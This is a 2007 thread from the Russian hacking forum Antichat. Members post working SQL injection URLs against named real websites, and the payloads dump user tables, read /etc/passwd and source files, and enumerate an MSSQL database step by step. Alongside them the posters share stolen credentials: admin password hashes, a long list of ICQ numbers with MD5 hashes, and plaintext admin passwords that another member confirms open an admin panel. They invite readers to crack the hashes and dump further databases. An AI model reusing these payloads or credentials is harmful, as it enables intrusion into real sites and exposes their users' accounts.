Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.06.2007, 13:43
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
www.wapro.ru
сайт www.wapro.ru посвящен WAP-у. PR-4. MySQL-5.
chatamobile.user
Код:
http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(login,char(58),password),3,4,5,6,7,8,9,10+from+chatamobile.user/*
mail.users
Код:
http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(domain,char(58),password),3,4,5,6,7,8,9,10+from+mail.users/*
mysql.user
Код:
http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(User,char(58),Password),3,4,5,6,7,8,9,10+from+mysql.user/*
foruma.fora_users
Код:
http://www.wapro.ru/melody/loadpoly.php?id=-2+union+select+1,concat(user_icq,char(58),user_password),3,4,5,6,7,8,9,10+from+foruma.fora_users/*
база давольно неплохая, вот админ
PHP код:
Admin:24ae2f800daf6a117841c5c61be67a67
дальше изучая базу я отобрал довольно красивые аськи(хочу заметить что пароли для входа на форум и могут и не подойти для уинов, но надежда, как говориться, умирает последней(как показывает практика, большенство юзеров используют один, относительно сложный пароль для всего)), надеюсь комуто из вас повезет в расшифровке MD5
442200:10ebf2d1e312389e3b8baca29f1fd421
23323332:95dc8fc16dc55e9d4902eaa0861638a5
423423:d9a40cfb1692dfd49829d109a8af86a5
27539:3bae43f4cfc7acd1a699e996ef3fac5b
345671:98c6838c94fe120d3082c8d5f4f413c9
984654:246889492fc07811d7582fd536b7d68c
987645:24e8ce64f14321a98dcab7ee41dfe9bc
987546:7cfbd7dbadb4f24607832821f7b303d6
885021:546af3c7c8b162b99963a6c62447a59d
568548:7f402a42733eff76f00c5bd6394621ed
1000001:d74c12c77e8259492f8003136a5c26ba
87964:2166428a87325ff398144b0d12cec45a
798613:d6e467f1f1f7839c5e03d51029faf393
787878:042bf3b0246f1bcdcf55c73e9a110e24
569874:a219b873b8172963ce021112159df72a
9955668:2ebb18ec08da2ac6c22f80a3205af3e8
132453:f50b911ff609c703baab2a8f2b085203
144442:0d1812f0d53bac5ff80fef2b9a41349d
987564:f5ccdca1979f823c8faae9abd5e9130e
104134:1fdb82c37295e1c087578c07f3ff6e46
243342:c64e0cf9ce260990d6472f3c333266dc
342295:c6872161c52f9620f887974469f32ada
535355:cde5c8d0c68fb39fdd9538d2e322d9a3
101444:a5e79e5498ff07ed2d6a583c37c8d829
293694:bd1ed02d8e1bb36a6c93a1247e02a0a7
548782:04bfb286a0a8c56153e62103f4cd44bf
846541:2ed4f8f98582f2d52f73bf578e96b82d
798755:a90371d82212679dbb6943dd6587f825
984679:c37b9bc2bf1579e8136ddad7bfcfbfdc
452356:c8443dcc4bad7c2ecd683cac9362ba09
3434899:a36ed3236641bff0aed700898285e881
821170:45f65bf28237101d4f810d9492789216
737084:bc3070228848d8cceabf3510bb254b7f
324876:5c5807bab80a0dee4bb43821db1dbe1f
Последний раз редактировалось _Pantera_; 28.06.2007 в 15:01..
|
|
|
28.06.2007, 15:48
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6/*
udb3478:Uwww3478S@localhost:4.0.26
Код:
http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),user_password),6+from+phpbb_users+limit+1,1/*
Past:fedfd9eb856714f7e503036b451b9305::: 8854051
Код:
http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),user_password),6+from+phpbb_users+where+username=char(122,117,98,105,108,111)/*
zubilo:2011fed5a93acfe8f9014bd5ebb3afed::: vfqrfg
Код:
http://www.redline61.ru/show_titel.php?name=bardachok&id=-1+union+select+1,2,3,4,concat(username,char(58),user_password),6+from+phpbb_users+where+username=char(69,68,68,89)/*
EDDY:67a0f0a3c1b6fbd6c4b4997bce86a5ed::: 421680 |
|
|
|
28.06.2007, 23:26
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от C!klodoL
cocacola.ru
Код:
http://cocacola.ru/promo/antidacha/story.php?id=1+union+select+1,DATABASE(),3,4,USER(),VERSION(),7,8,9/*
таблицы подбирать было лень Таблица users
Код:
http://cocacola.ru/promo/antidacha/story.php?id=1+union+select+1,2,3,4,5,concat(name,0x3a,password,0x3a,email),7,8,9+from+users+where+id=1/*
Правда всего одна запись - админ 
admin:7b21848ac9af35be0ddb2d6b9fc3851934db8420:inf o@rg.by
|
|
|
|
29.06.2007, 10:55
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546
Репутация:
1327
|
|
Код:
http://links.allprikol.ru/links.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(name,char(58),password),0x78),0x78),3+from+admin/*
пассы админов в открытом виде, но админки найти не смог, кто найдет поставлю +5
fishkafix:lorddark13
DtSc:ldoprhhk
_______
Код:
http://www.trubka.ru/cellular/links_s.php?id=-2+union+select+1,concat(login,char(58),password),3,4+from+admin/*
Последний раз редактировалось _Pantera_; 29.06.2007 в 12:52..
|
|
|
|
29.06.2007, 12:32
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://www.fibl.org/english/mail.php?id=-7+union+select+1,VERSION(),3/*
Код:
http://agtw.abime.net/game.php?id=-7+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+limit+26,1/*
Код:
http://www.wap.pfl.com.ua/game.php?id=-12151++union+select+1,2,3,4,5,6,VERSION(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
Последний раз редактировалось SWAT; 29.06.2007 в 13:10..
|
|
|
|
29.06.2007, 14:46
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
http://www.study.ee/gallery/index.php?action=showgal&cat=-15+union+select+1,2,3,4,5,6,7,version(),9,10,11,12 ,13,14,15/*
Резултат смотрим в исходнике
Downloads: 11
Added: 01.01.70
(4.0.24-standard-log bytes)" title="Views: 6
Downloads: 11
Added: 01.01.70
|
|
|
|
29.06.2007, 15:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
2 _Pantera_
ну вот тут ессть админка http://admin.allprikol.ru/
пассы подходят
|
|
|
|
29.06.2007, 18:42
|
|
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536
Репутация:
932
|
|
Код:
http://www.bantjes.com/index.php?id=-150+union+select+concat(user(),version(),database())/*
|
|
|
|
30.06.2007, 00:12
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
http://www.tennisnews.com/
PR-5
http://www.tennisnews.com/exclusive.php?pID=20630'+union+select+1,2,3,4,5,6, 71,8,9,0,1,2,3,4,5,6,72,8,9,0,1,2,3,4,5,6,concat_w s(0x3a,user(),version(),database()),8,9,0,1,2,3,4, 5,6,7,8,9/*
найдены таблицы
partner (email,name,passwd,phone,pid) , subscriber
Так же работает читалка ))
http://www.tennisnews.com/exclusive.php?pID=20630'+union+select+1,2,3,4,5,6, 71,8,9,0,1,2,3,4,5,6,72,8,9,0,1,2,3,4,5,6,load_fil e('/etc/passwd'),8,9,0,1,2,3,4,5,6,7,8,9/*
http://www.tennisnews.com/exclusive.php?pID=20630'+union+select+1,2,3,4,5,6, 71,8,9,0,1,2,3,4,5,6,72,8,9,0,1,2,3,4,5,6,load_fil e('/home4/tennisne/tennisnews-www/exclusive.php'),8,9,0,1,2,3,4,5,6,7,8,9/*
|
|
|
|
01.07.2007, 02:37
|
|
Moderator - Level 7
Регистрация: 21.03.2007
Сообщений: 1,200
Провел на форуме:
7134052
Репутация:
1204
|
|
www.g-play.ru
Подозрение на инъекцию:
http://www.g-play.ru/buycd.asp?code=1'
MSSQL
Узнаем версию:
http://www.g-play.ru/buycd.asp?code=1%20or%201=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
Узнаем юзера:
http://www.g-play.ru/buycd.asp?code=1%20or%201=(select%20system_user)--
g-play4
Узнаем имя базы:
http://www.g-play.ru/buycd.asp?code=1%20or%201=(select%20db_name())--
g-play
Смотрим таблицы:
http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+table_name+fro m+information_schema.tables)--
и т.д. В итоге:
T_Countrys_R
A_Category
A_HardReviews
A_Price
dtproperties
G_Вопросы
G_Закачки
G_Новости
G_Проекты
G_Сотрудники
G_Ссылки
G_ТемыВопросов
G_Услуги
sysconstraints
T_Anketa
T_BusinessDopOrel
T_BusinessMainOrel
T_BusinessTula
T_Countrys_I
T_Entries_GPLAY
T_Forums_GPLAY
T_Forums_Users
T_PersonalTula
T_PrivateOrel
T_Rate
T_Towns_I
T_Towns_R
Z_News
Z_Texts
Z_Uchastok
Т_Автор
Т_Афоризмы
Т_ЖанрИгры
Т_Игры
Т_Закачки
Т_Изготовитель
Т_Мнения
Т_Новости
Т_Описания
Т_Процессор
Т_Публикатор
Т_Разделы
Т_Скриншоты
Т_Ссылки
Т_СсылкиТел
Т_ЧитКоды
Заинтересовала таблица 'T_Forums_Users'. Смотрим столбцы.
http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+column_name+fr om+information_schema.columns+where+table_name='T_ Forums_Users')--
и т.д. В итоге:
userid
UserName
UserEMail
Location
Occupation
URL
Interests
ICQnum
Signature
ShowEMail
Password
ActiveUser
StorePassword
CloseUser
Итак, вот что мы имеем (а именно - администратора):
http://www.g-play.ru/buycd.asp?code=1+or+1=(select+top+1+cast(UserName+ as+nvarchar)%2B%27%3A%27%2Bcast(UserEMail+as+nvarc har)%2B%27%3A%27%2Bcast(ICQnum+as+nvarchar)%2B%27% 3A%27%2Bcast(Password+as+nvarchar)+from+T_Forums_U sers+where+userid=1)--
Ребят, хочется сдампить базу, помогите. Понимаю, что элементарно, только вот php только хотел начать изучать.. В пм если можно..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Похожие темы
Линейный вид
